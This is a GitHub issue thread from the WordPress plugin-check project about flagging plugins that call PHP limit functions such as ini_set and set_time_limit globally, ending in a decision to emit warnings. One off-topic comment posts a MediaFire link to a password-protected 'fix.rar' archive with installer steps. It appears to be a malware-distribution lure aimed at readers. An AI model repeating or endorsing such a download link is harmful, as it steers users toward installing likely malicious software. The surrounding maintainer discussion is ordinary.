### ISSUE TITLE
Check: Don't Force Set PHP Limits Globally

### ISSUE THREAD

**Issue by davidperezgar** [10up/plugin-check#587]
While reviewing plugins, we don't allow developers to set global defaults. 

Having defines like ini_set('memory_limit', '-1'); run globally (like on init or in the __construct() part of the code) means developers will be running that for everything on the site, which may cause their users to fall out of compliance with any limits or restrictions on their host.

If they must use those, they need to limit them specifically to only the exact functions that require them.

Functions not allowed run in global: `set_time_limit, ini_set, ini_alter, dl`

More info: https://www.php.net/manual/en/ref.info.php

**Comment by littleblack666333** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by swissspidy** [comment]
Can just expand this list here:

https://github.com/WordPress/plugin-check/blob/02a1d7801de3fa556087a0386e93db0bb1df71eb/phpcs-rulesets/plugin-review.xml#L78-L89

WPCS also has some similar sniffs with more focused error messages, but I think just expanding the above list is good enough.

**Comment by davidperezgar** [comment]
Ok! I'll check it. Thanks

**Comment by ernilambar** [comment]
```
If they must use those, they need to limit them specifically to only the exact functions that require them.
```

In `Generic.PHP.ForbiddenFunctions` sniff, those functions are completely rejected. It does not  handle whether it is in global scope or not.

**Comment by davidperezgar** [comment]
Yes, you're right. But they are not recommended. I'd make a less severity to make a future warning in wp.org.

**Comment by ernilambar** [comment]
From the Plugin Review meeting, it has been decided that these functions should generate warning instead of error as these functions are allowed sometimes in case by case basis.
